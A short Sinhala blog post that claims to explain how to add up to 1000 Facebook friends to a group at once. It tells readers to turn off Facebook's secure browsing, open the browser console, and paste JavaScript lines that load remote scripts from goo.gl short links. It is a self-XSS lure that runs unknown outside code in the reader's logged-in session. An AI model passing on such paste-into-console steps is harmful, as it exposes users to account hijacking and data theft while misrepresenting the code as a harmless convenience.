ලෙසීයෙන්ම ගෘප් එකකට එක පාර members ලා අම්බානෙට ඇඩ් කරන්නේ මෙහෙමයි
මෙන්න මේකනං බුකියේ ගෘප් හදන් ඉන්න අයට ඵට්ටේට වටින් වැඩක් ... මේ ක්‍රමෙන් එක පාර මෙම්බර්ස්ලා 1000ක් ගෘප් එකට දාන්නා පුළුවන්.. යාලුවනේ මේකෙදි වෙන්නේ අපේ ඉන්න ෆ්රෙන්ඩ්ස්ලට අදාළ ගෘප් එකට ඔටෝම ඉන්වයිට් වෙන එක... ඉතින් ඔටෝම ඉන්වයිට් වෙනවා කියන්නේ ඔටෝම ඇඩ් වෙනවා කියන එක තමයි ...
මුලින්ම මේකෙන් මෙම්බර්ස්ලා ඇඩ් කරන්න කලින් .. පිලි පදින්න ඕනි දෙයක් තියනවා .. අපේ ෆේස් බුක් එකවුන්ට් එකේ Secure browsing disable. කරන්න ඕනි මෙතනින් ගිහින් ඒ සෙටින්ස් වෙන කරගන්න ..
මුලින්ම අපි මේක ගුගල් ක්‍රෝම්(google chrome) බ්‍රවුසරෙන් කරන විදිය බලමු
ඉහත පරිදි setting හදාගත්තට පස්සේ මුලින්ම ෆ්‍රෙන්ඩ්ස්ලා add කරන්න ඕනි ගෘප් එකට යන්න
ඊට පස්සේ F12 button එක ප්‍රෙස් කරන්න නැතිනම right click කරලා Inspect Element දෙන්න ..
ඊට පස්සේ යටින් ටැබ් එකක් එයි එකෙන් console කියන එක click කරන්න
දැන් ඔතන එන එක උඩ ආයේ right click කරලා clear console දෙන්න ඊට පස්සේ මේ වගේ හිස් වෙයි ..
දැන් මම මේ පහත දෙන කෝඩ් එක ඔතනට past කරන්න
document.body.appendChild(document.createElement('script')).src='http://goo.gl/TDJi8';
දැන් enter ඔබන්න ... ටිකක් වෙලා බලාගෙන ඉන්න පහත සඳහන විදියට ගෘප් එකට මෙම්බර්ස්ලා ඇඩ් වෙනවා පෙනේවි
document.body.appendChild(document.createElement('script')).src='http://goo.gl/YzGHt';
යාලුවෙන තව පොඩි ප්‍රශ්නයක් තියනවා .. මගේ කලින් සොෆ්ට්වෙයාර් දුන්නනේ අන්න ඒවායේ ෂෙයාර් කරපු එකවුන්ට් එක ඩිසේබල් වෙලා .. මට ආයේ අප්ලෝඩ් කරන්න ඩේටා නැහැ . ඉලග මාසේ අප්ලෝඩ් කරලා දෙන්නම් ආ එතකන් තර වෙන්න එපා ඇ ...
තව දෙයක් .. මේක කියල දුන්නු උදවුවටවත් මෙන්න මේ ගෘප් එකට මෙම්බර්ස්ලා ටිකක ඇඩ් කරන්න ඇ ..
ලෙසීයෙන්ම ගෘප් එකකට එක පාර members ලා අම්බානෙට ඇඩ් කරන්නේ මෙහෙමයි
Reviewed by සුදු මහත්තයා
on
4:13 PM
Rating: